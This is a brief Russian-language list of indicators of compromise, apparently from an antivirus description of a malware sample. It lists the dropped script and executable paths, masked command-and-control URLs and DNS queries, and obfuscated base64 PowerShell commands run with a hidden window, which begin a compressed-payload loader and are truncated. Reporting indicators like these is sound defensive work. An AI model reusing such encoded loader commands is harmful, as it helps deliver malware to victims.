Техническая информация
- '<SYSTEM32>\wscript.exe' "%WINDIR%\Temp\rforsewzhv.js"
- %WINDIR%\temp\rforsewzhv.js
- %WINDIR%\temp\701.exe
- http://al####usenberg.com/Hwick.php
- http://www.al####usenberg.com/Hwick.php
- DNS ASK sp###rerck.com
- DNS ASK al####usenberg.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -En IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBtA...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -En IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBtA...